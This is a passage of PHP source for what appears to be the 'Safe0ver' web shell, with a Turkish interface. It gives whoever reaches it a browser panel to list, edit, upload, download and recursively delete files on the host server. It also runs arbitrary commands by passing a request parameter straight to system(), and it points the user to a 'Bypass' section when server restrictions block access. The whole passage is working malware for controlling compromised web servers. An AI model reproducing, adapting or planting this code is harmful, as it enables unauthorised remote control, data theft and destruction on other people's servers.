||||
"Rename" => "rename.gif",
|
||||
"Move" => "move.gif",
|
||||
"Copy" => "copy.gif",
|
||||
"Execute" => "exec.gif"
|
||||
);
|
||||
|
||||
while (list($id, $im)=each($img))
|
||||
if (file_exists("$LOCAL_IMAGE_DIR/$im"))
|
||||
$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
|
||||
else
|
||||
$img[$id] = "[$id]";
|
||||
|
||||
|
||||
|
||||
|
||||
/* HTTP AUTHENTICATION */
|
||||
|
||||
if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
|
||||
setcookie("noauth","");
|
||||
Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
|
||||
Header( "HTTP/1.0 401 Unauthorized");
|
||||
echo "Your username or password is incorrect";
|
||||
exit ;
|
||||
|
||||
}
|
||||
|
||||
function buildUrl($display, $url) {
|
||||
global $urlAdd;
|
||||
$url = $SFileName . "?$urlAdd$url";
|
||||
return "<a href=\"$url\">$display</a>";
|
||||
}
|
||||
|
||||
function sp($mp) {
|
||||
for ( $i = 0; $i < $mp; $i++ )
|
||||
$ret .= " ";
|
||||
return $ret;
|
||||
}
|
||||
|
||||
function spacetonbsp($instr) { return str_replace(" ", " ", $instr); }
|
||||
|
||||
function Mydeldir($Fdir) {
|
||||
if (is_dir($Fdir)) {
|
||||
$Fh=@opendir($Fdir);
|
||||
while ($Fbuf = readdir($Fh))
|
||||
if (($Fbuf != ".") && ($Fbuf != ".."))
|
||||
Mydeldir("$Fdir/$Fbuf");
|
||||
@closedir($Fh);
|
||||
return rmdir($Fdir);
|
||||
} else {
|
||||
return unlink($Fdir);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
function arrval ($array) {
|
||||
list($key, $data) = $array;
|
||||
return $data;
|
||||
}
|
||||
|
||||
function formatsize($insize) {
|
||||
$size = $insize;
|
||||
$add = "B";
|
||||
if ($size > 1024) {
|
||||
$size = intval(intval($size) / 1.024)/1000;
|
||||
$add = "KB";
|
||||
}
|
||||
if ($size > 1024) {
|
||||
$size = intval(intval($size) / 1.024)/1000;
|
||||
$add = "MB";
|
||||
}
|
||||
if ($size > 1024) {
|
||||
$size = intval(intval($size) / 1.024)/1000;
|
||||
$add = "GB";
|
||||
}
|
||||
if ($size > 1024) {
|
||||
$size = intval(intval($size) / 1.024)/1000;
|
||||
$add = "TB";
|
||||
}
|
||||
return "$size $add";
|
||||
}
|
||||
|
||||
if ($cmd != "downl") {
|
||||
?>
|
||||
|
||||
<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
|
||||
<HTML>
|
||||
<HEAD>
|
||||
<STYLE>
|
||||
<!--
|
||||
A{ text-decoration:none; color:navy; font-size: 12px }
|
||||
body {
|
||||
font-size: 12px;
|
||||
font-family: arial, helvetica;
|
||||
scrollbar-width: 5;
|
||||
scrollbar-height: 5;
|
||||
scrollbar-face-color: white;
|
||||
scrollbar-shadow-color: silver;
|
||||
scrollbar-highlight-color: white;
|
||||
scrollbar-3dlight-color:silver;
|
||||
scrollbar-darkshadow-color: silver;
|
||||
scrollbar-track-color: white;
|
||||
scrollbar-arrow-color: black;
|
||||
background-color: #CCCCCC;
|
||||
}
|
||||
Table { font-size: 12px; }
|
||||
TR{ font-size: 12px; }
|
||||
TD{
|
||||
font-size: 12px;
|
||||
font-family: arial, helvetical;
|
||||
BORDER-LEFT: black 0px solid;
|
||||
BORDER-RIGHT: black 0px solid;
|
||||
BORDER-TOP: black 0px solid;
|
||||
BORDER-BOTTOM: black 0px solid;
|
||||
COLOR: black;
|
||||
background: #CCCCCC;
|
||||
}
|
||||
.border{ BORDER-LEFT: black 1px solid;
|
||||
BORDER-RIGHT: black 1px solid;
|
||||
BORDER-TOP: black 1px solid;
|
||||
BORDER-BOTTOM: black 1px solid;
|
||||
}
|
||||
.none { BORDER-LEFT: black 0px solid;
|
||||
BORDER-RIGHT: black 0px solid;
|
||||
BORDER-TOP: black 0px solid;
|
||||
BORDER-BOTTOM: black 0px solid;
|
||||
}
|
||||
.inputtext {
|
||||
background-color: #EFEFEF;
|
||||
font-family: arial, helvetica;
|
||||
border: 1px solid #000000;
|
||||
height: 20;
|
||||
}
|
||||
.lighttd { background: #F8F8F8;
|
||||
}
|
||||
.darktd { background: #CCCCCC;
|
||||
}
|
||||
input { font-family: arial, helvetica;
|
||||
}
|
||||
.inputbutton {
|
||||
background-color: #CCCCCC;
|
||||
border: 1px solid #000000;
|
||||
border-width: 1px;
|
||||
height: 20;
|
||||
}
|
||||
.inputtextarea {
|
||||
background-color: #CCCCCC;
|
||||
border: 1px solid #000000;
|
||||
scrollbar-width: 5;
|
||||
scrollbar-height: 5;
|
||||
scrollbar-face-color: #EFEFEF;
|
||||
scrollbar-shadow-color: silver;
|
||||
scrollbar-highlight-color: #EFEFEF;
|
||||
scrollbar-3dlight-color:silver;
|
||||
scrollbar-darkshadow-color: silver;
|
||||
scrollbar-track-color: #EFEFEF;
|
||||
scrollbar-arrow-color: black;
|
||||
}
|
||||
.top { BORDER-TOP: black 1px solid; }
|
||||
.textin { BORDER-LEFT: silver 1px solid;
|
||||
BORDER-RIGHT: silver 1px solid;
|
||||
BORDER-TOP: silver 1px solid;
|
||||
BORDER-BOTTOM: silver 1px solid;
|
||||
width: 99%; font-size: 12px; font-weight: bold; color: Black;
|
||||
}
|
||||
.notop { BORDER-TOP: black 0px solid; }
|
||||
.bottom { BORDER-BOTTOM: black 1px solid; }
|
||||
.nobottom { BORDER-BOTTOM: black 0px solid; }
|
||||
.left { BORDER-LEFT: black 1px solid; }
|
||||
.noleft { BORDER-LEFT: black 0px solid; }
|
||||
.right { BORDER-RIGHT: black 1px solid; }
|
||||
.noright { BORDER-RIGHT: black 0px solid; }
|
||||
.silver{ BACKGROUND: #CCCCCC; }
|
||||
body,td,th {
|
||||
color: #660000;
|
||||
}
|
||||
a:link {
|
||||
color: #000000;
|
||||
text-decoration: none;
|
||||
}
|
||||
a:hover {
|
||||
color: #00FF00;
|
||||
text-decoration: none;
|
||||
}
|
||||
a:active {
|
||||
color: #666666;
|
||||
text-decoration: none;
|
||||
}
|
||||
a:visited {
|
||||
text-decoration: none;
|
||||
}
|
||||
.style5 {
|
||||
color: #660000;
|
||||
font-weight: bold;
|
||||
}
|
||||
-->
|
||||
</STYLE>
|
||||
<TITLE><?php echo $SFileName ?></TITLE>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
|
||||
<body topmargin="0" leftmargin="0">
|
||||
<div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
|
||||
<table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
|
||||
<tr>
|
||||
<td width="100%" class="silver border"><center>
|
||||
<strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
|
||||
</center></td>
|
||||
</tr>
|
||||
</table>
|
||||
<table width=100% height="100%" NOWRAP border="0">
|
||||
<tr NOWRAP>
|
||||
<td width="100%" NOWRAP><br>
|
||||
|
||||
<?php
|
||||
}
|
||||
|
||||
if ( $cmd=="dir" ) {
|
||||
$h=@opendir($dir);
|
||||
if ($h == false) {
|
||||
echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
|
||||
Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
|
||||
Script Gecisi Tamamlayamadi!
|
||||
<br><br>".sp(3)."\n
|
||||
Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
|
||||
<br><br></font>\n\n\n\n";
|
||||
}
|
||||
if (function_exists('realpath')) {
|
||||
$partdir = realpath($dir);
|
||||
}
|
||||
else {
|
||||
$partdir = $dir;
|
||||
}
|
||||
if (strlen($partdir) >= 100) {
|
||||
$partdir = substr($partdir, -100);
|
||||
$pos = strpos($partdir, "/");
|
||||
if (strval($pos) != "") {
|
||||
$partdir = "<-- ...".substr($partdir, $pos);
|
||||
}
|
||||
$partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
|
||||
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
|
||||
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
|
||||
}
|
||||
?>
|
||||
<form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
|
||||
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
|
||||
<tr>
|
||||
<td width="100%" class="silver border">
|
||||
<center> Safe0ver-Server File Browser... </center>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br>
|
||||
<table width="100%" border="0" cellpadding="0" cellspacing="0">
|
||||
<tr>
|
||||
<td class="border nobottom noright">
|
||||
Listeliyor:
|
||||
</td>
|
||||
<td width="100%" class="border nobottom noleft">
|
||||
<table width="100%" border="0" cellpadding="1" cellspacing="0">
|
||||
<tr>
|
||||
<td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
|
||||
<td NOWRAP><center> <a href="javascript: urlform.submit();"><b>GiT<b></a> <center></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<!-- </form> -->
|
||||
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
|
||||
<tr>
|
||||
<td width="100%" NOWRAP class="silver border">
|
||||
Dosya Adi
|
||||
</td>
|
||||
<td NOWRAP class="silver border noleft">
|
||||
Yapilabilecekler
|
||||
</td>
|
||||
<td NOWRAP class="silver border noleft">
|
||||
Boyut
|
||||
</td>
|
||||
<td width=1 NOWRAP class="silver border noleft">
|
||||
Yetkiler
|
||||
</td>
|
||||
<td NOWRAP class="silver border noleft">
|
||||
Son Düzenleme
|
||||
</td>
|
||||
<tr>
|
||||
<?php
|
||||
|
||||
|
||||
/* <!-- This whole heap of junk is the sorting section... */
|
||||
|
||||
$dirn = array();
|
||||
$filen = array();
|
||||
$filesizes = 0;
|
||||
while ($buf = readdir($h)) {
|
||||
if (is_dir("$dir/$buf"))
|
||||
$dirn[] = $buf;
|
||||
else
|
||||
$filen[] = $buf;
|
||||
}
|
||||
$dirno = count($dirn) + 1;
|
||||
$fileno = count($filen) + 1;
|
||||
|
||||
function mycmp($a, $b){
|
||||
if ($a == $b) return 0;
|
||||
return (strtolower($a) < strtolower($b)) ? -1 : 1;
|
||||
}
|
||||
|
||||
if (function_exists("usort")) {
|
||||
usort($dirn, "mycmp");
|
||||
usort($filen, "mycmp");
|
||||
}
|
||||
else {
|
||||
sort ($dirn);
|
||||
sort ($filen);
|
||||
}
|
||||
reset ($dirn);
|
||||
reset ($filen);
|
||||
if (function_exists('array_merge')) {
|
||||
$filelist = array_merge ($dirn, $filen);
|
||||
}
|
||||
else {
|
||||
$filelist = $dirn + $filen;
|
||||
}
|
||||
|
||||
|
||||
if ( count($filelist)-1 > $Pmax ) {
|
||||
$from = $Pidx * $Pmax;
|
||||
$to = ($Pidx + 1) * $Pmax-1;
|
||||
if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
|
||||
$to = count($filelist) - 1;
|
||||
if ($to > count($filelist)-1)
|
||||
$to = count($filelist)-1;
|
||||
$Dcontents = array();
|
||||
For ($Fi = $from; $Fi <= $to; $Fi++) {
|
||||
$Dcontents[] = $filelist[$Fi];
|
||||
}
|
||||
|
||||
}
|
||||
else {
|
||||
$Dcontents = $filelist;
|
||||
}
|
||||
|
||||
$tdcolors = array("lighttd", "darktd");
|
||||
|
||||
while (list ($key, $file) = each ($Dcontents)) {
|
||||
if (!$tdcolor=arrval(each($tdcolors))) {
|
||||
reset($tdcolors);
|
||||
$tdcolor = arrval(each($tdcolors)); }
|
||||
|
||||
if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
|
||||
/* <!-- Dirname --> */
|
||||
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
|
||||
/* <!-- Actions --> */
|
||||
echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
|
||||
/* <!-- Rename --> */
|
||||
if ( ($file != ".") && ($file != "..") )
|
||||
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
|
||||
/* <!-- Delete --> */
|
||||
if ( ($file != ".") && ($file != "..") )
|
||||
echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
|
||||
/* <!-- End of Actions --> */
|
||||
echo " </center></td>\n";
|
||||
/* <!-- Size --> */
|
||||
echo "<td NOWRAP class=\"top right $tdcolor\"> </td>\n";
|
||||
/* <!-- Attributes --> */
|
||||
echo "<td NOWRAP class=\"top right $tdcolor\"> \n";
|
||||
echo "<strong>D</strong>";
|
||||
if ( @is_readable("$dir/$file") ) {
|
||||
echo "<strong>R</strong>";
|
||||
}
|
||||
if (function_exists('is_writeable')) {
|
||||
if ( @is_writeable("$dir/$file") ) {
|
||||
echo "<strong>W</stong>";
|
||||
}
|
||||
}
|
||||
else {
|
||||
echo "<strong>(W)</stong>";
|
||||
}
|
||||
if ( @is_executable("$dir/$file") ) {
|
||||
echo "<Strong>X<strong>";
|
||||
}
|
||||
echo " </td>\n";
|
||||
/* <!-- Date --> */
|
||||
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
|
||||
echo " ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))." ";
|
||||
echo "</td>";
|
||||
echo "</tr>\n";
|
||||
|
||||
}
|
||||
else { /* <!-- Then it must be a File... --> */
|
||||
/* <!-- Filename --> */
|
||||
if ( @is_readable("$dir/$file") )
|
||||
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
|
||||
else
|
||||
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
|
||||
/* <!-- Actions --> */
|
||||
echo "<td NOWRAP class=\"top right $tdcolor\"><center> \n";
|
||||
/* <!-- Rename --> */
|
||||
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
|
||||
/* <!-- Edit --> */
|
||||
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
|
||||
echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
|
||||
/* <!-- Copy --> */
|
||||
echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
|
||||
/* <!-- Move --> */
|
||||
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
|
||||
echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
|
||||
/* <!-- Delete --> */
|
||||
echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
|
||||
/* <!-- Download --> */
|
||||
echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
|
||||
/* <!-- Execute --> */
|
||||
if ( @is_executable("$dir/$file") )
|
||||
echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
|
||||
/* <!-- End of Actions --> */
|
||||
echo sp(2)."</center></td>\n";
|
||||
/* <!-- Size --> */
|
||||
echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
|
||||
$size = @filesize("$dir/$file");
|
||||
If ($size != false) {
|
||||
$filesizes += $size;
|
||||
echo " <strong>".formatsize($size)."<strong>";
|
||||
}
|
||||
else
|
||||
echo " <strong>0 B<strong>";
|
||||
echo " </td>\n";
|
||||
|
||||
/* <!-- Attributes --> */
|
||||
echo "<td NOWRAP class=\"top right $tdcolor\"> \n";
|
||||
|
||||
if ( @is_readable("$dir/$file") )
|
||||
echo "<strong>R</strong>";
|
||||
if ( @is_writeable("$dir/$file") )
|
||||
echo "<strong>W</stong>";
|
||||
if ( @is_executable("$dir/$file") )
|
||||
echo "<Strong>X<strong>";
|
||||
if (function_exists('is_uploaded_file')){
|
||||
if ( @is_uploaded_file("$dir/$file") )
|
||||
echo "<Strong>U<strong>";
|
||||
}
|
||||
else {
|
||||
echo "<Strong>(U)<strong>";
|
||||
}
|
||||
echo " </td>\n";
|
||||
/* <!-- Date --> */
|
||||
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
|
||||
echo " ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))." ";
|
||||
echo "</td>";
|
||||
echo "</tr>\n";
|
||||
}
|
||||
}
|
||||
|
||||
echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
|
||||
echo " ".@count ($dirn)." Klasör, ".@count ($filen)." Dosya \n";
|
||||
echo "</td><td NOWRAP class=\"silver border noleft\">\n";
|
||||
echo " Toplam Dosya Boyutu: ".formatsize($filesizes)." <td></tr>\n";
|
||||
|
||||
function printpagelink($a, $b, $link = ""){
|
||||
if ($link != "")
|
||||
echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
|
||||
else
|
||||
echo "<b>| $a - $b |</b>";
|
||||
}
|
||||
|
||||
if ( count($filelist)-1 > $Pmax ) {
|
||||
echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
|
||||
$Fi = 0;
|
||||
while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
|
||||
$from = $Fi*$Pmax;
|
||||
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
|
||||
$to = ($Fi + 1) * $Pmax - 1;
|
||||
if ($Fi == $Pidx)
|
||||
$link="";
|
||||
else
|
||||
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
|
||||
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
|
||||
echo " ";
|
||||
$Fi++;
|
||||
}
|
||||
$from = $Fi*$Pmax;
|
||||
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
|
||||
$to = count($filelist)-1;
|
||||
if ($Fi == $Pidx)
|
||||
$link="";
|
||||
else
|
||||
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
|
||||
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
|
||||
|
||||
|
||||
echo "</center></td></tr></table></td></tr>";
|
||||
}
|
||||
|
||||
|
||||
echo "</table>\n<br><table NOWRAP>";
|
||||
|
||||
if ($isGoodver) {
|
||||
echo "<tr><td class=\"silver border\"> <strong>PHP Versiyonu: </strong> </td><td> $PHPVer </td></tr>\n";
|
||||
}
|
||||
else {
|
||||
echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version: </strong> </td><td> $PHPVer (Some functions might be unavailable...) </td></tr>\n";
|
||||
}
|
||||
/* <!-- Other Actions --> */
|
||||
echo "<tr><td class=\"silver border\"> <strong>Diger Islemler: </strong> </td>\n";
|
||||
echo "<td> <b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
|
||||
buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
|
||||
buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
|
||||
echo "<tr><td class=\"silver border\"> <strong>Script Location: </strong> </td><td> $PATH_TRANSLATED</td></tr>\n";
|
||||
echo "<tr><td class=\"silver border\"> <strong>IP Adresin: </strong> </td><td> $REMOTE_ADDR </td></tr>\n";
|
||||
echo "<tr><td class=\"silver border\"> <strong>Bulundugun Klasör: </strong></td><td> $partdir </td></tr>\n";
|
||||
echo "<tr><td valign=\"top\" class=\"silver border\"> <strong>Semboller: </strong </td><td>\n";
|
||||
echo "<table NOWRAP>";
|
||||
echo "<tr><td><strong>D:</strong></td><td> Klasör.</td></tr>\n";
|
||||
echo "<tr><td><strong>R:</strong></td><td> Okunabilir.</td></tr>\n";
|
||||
echo "<tr><td><strong>W:</strong></td><td> Yazilabilir.</td></tr>\n";
|
||||
echo "<tr><td><strong>X:</strong></td><td> Komut Calistirilabilir.</td></tr>\n";
|
||||
echo "<tr><td><strong>U:</strong></td><td> HTTP Uploaded File.</td></tr>\n";
|
||||
echo "</table></td>";
|
||||
echo "</table>";
|
||||
echo "<br>";
|
||||
@closedir($h);
|
||||
}
|
||||
elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
|
||||
echo system("$file");
|
||||
}
|
||||
elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
|
||||
echo "<center><table><tr><td NOWRAP>" ;
|
||||
if ($auth == "yes") {
|
||||
if (Mydeldir($file)==false) {
|
||||
echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
|
||||
}
|
||||
else {
|
||||
echo "Successfully removed \"$file\"<br>";
|
||||
}
|
||||
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
|
||||
}
|
||||
else {
|
||||
echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
|
||||
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||
<input type=\"hidden\" name=\"cmd\" value=\"deldir\">
|
||||
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
|
||||
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
|
||||
<input type=\"hidden\" name=\"file\" value=\"$file\">
|
||||
<input type=\"hidden\" name=\"auth\" value=\"yes\">
|
||||
<input type=\"submit\" value=\"Yes\"></form>
|
||||
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
||||
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
||||
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
|
||||
}
|
||||
echo "</td></tr></center>";
|
||||
}
|
||||
elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ;
|
||||
if ($auth == "yes") {
|
||||
if (@unlink($file)==false) {
|
||||
echo "Could not remove \"$file\"<br>";
|
||||
}
|
||||
else {
|
||||
echo "Successfully removed \"$file\"<br>";
|
||||
}
|
||||
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
|
||||
}
|
||||
else {
|
||||
echo "Are you sure you want to delete \"$file\" ?
|
||||
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||
<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
|
||||
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
|
||||
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
|
||||
<input type=\"hidden\" name=\"file\" value=\"$file\">
|
||||
<input type=\"hidden\" name=\"auth\" value=\"yes\">
|
||||
|
||||
<input type=\"submit\" value=\"Yes\"></form>
|
||||
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
||||
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
||||
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
|
||||
}
|
||||
echo "</td></tr></center>";
|
||||
}
|
||||
elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
|
||||
echo "<center><table><tr><td NOWRAP>";
|
||||
$i = 1;
|
||||
while (file_exists("$lastdir/newfile$i.txt"))
|
||||
$i++;
|
||||
$file = fopen("$lastdir/newfile$i.txt", "w+");
|
||||
if ($file == false)
|
||||
echo "Could not create the new file...<br>";
|
||||
else
|
||||
echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
|
||||
echo "
|
||||
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
||||
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
||||
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
|
||||
</form></center>
|
||||
</td></tr></table></center> ";
|
||||
}
|
||||
elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
|
||||
echo "<center><table><tr><td NOWRAP>" ;
|
||||
$i = 1;
|
||||
while (is_dir("$lastdir/newdir$i"))
|
||||
$i++;
|
||||
$file = mkdir("$lastdir/newdir$i", 0777);
|
||||
if ($file == false)
|
||||
echo "Could not create the new directory...<br>";
|
||||
else
|
||||
echo "Successfully created: \"$lastdir/newdir$i\"<br>";
|
||||
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
||||
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
||||
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
|
||||
</form></center></td></tr></table></center>";
|
||||
}
|
||||
elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
|
||||
$contents = "";
|
||||
$fc = @file( $file );
|
||||
while ( @list( $ln, $line ) = each( $fc ) ) {
|
||||
$contents .= htmlentities( $line ) ;
|
||||
}
|
||||
echo "<br><center><table><tr><td NOWRAP>";
|
||||
echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
|
||||
echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
|
||||
echo "<strong>EDIT FILE: </strong>$file<br>\n";
|
||||
echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
|
||||
echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
|
||||
echo "<input type=\"submit\" value=\"Save\">";
|
||||
echo "</form>";
|
||||
echo "</td></tr></table></center>";
|
||||
}
|
||||
elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
|
||||
$fo = fopen($file, "w");
|
||||
$wrret = fwrite($fo, stripslashes($contents));
|
||||
$clret = fclose($fo);
|
||||
}
|
||||
elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
|
||||
$downloadfile = urldecode($file);
|
||||
if (function_exists("basename"))
|
||||
$downloadto = basename ($downloadfile);
|
||||
else
|
||||
$downloadto = "download.ext";
|
||||
if (!file_exists("$downloadfile"))
|
||||
echo "The file does not exist";
|
||||
else {
|
||||
$size = @filesize("$downloadfile");
|
||||
if ($size != false) {
|
||||
$add="; size=$size";
|
||||
}
|
||||
else {
|
||||
$add="";
|
||||
}
|
||||
header("Content-Type: application/download");
|
||||
header("Content-Disposition: attachment; filename=$downloadto$add");
|
||||
$fp=fopen("$downloadfile" ,"rb");
|
||||
fpassthru($fp);
|
||||
flush();
|
||||
}
|
||||
}
|
||||
elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
|
||||
?>
|
||||
<center>
|
||||
<table>
|
||||
<tr>
|
||||
<td NOWRAP>
|
||||
Dosya Yükleme Sekmesine Tikladiniz !
|
||||
<br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
|
||||
<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
|
||||
<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
|
||||
<input type="hidden" name="cmd" value="uploadproc">
|
||||
<input type="hidden" name="dir" value="<?php echo $dir ?>">
|
||||
<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
|
||||
<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
|
||||
Dosya Yükle:<br>
|
||||
<input size="75" name="userfile" type="file"><br>
|
||||
<input type="submit" value="Yükle">
|
||||
</form>
|
||||
<br>
|
||||
<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
|
||||
<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
|
||||
<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
|
||||
<input tabindex="0" type="submit" value="Iptal">
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
|
||||
<?php
|
||||
}
|
||||
elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
|
||||
echo "<center><table><tr><td NOWRAP>";
|
||||
if (file_exists($userfile))
|
||||
$res = copy($userfile, "$dir/$userfile_name");
|
||||
echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
|
||||
if ($res) {
|
||||
echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
|
||||
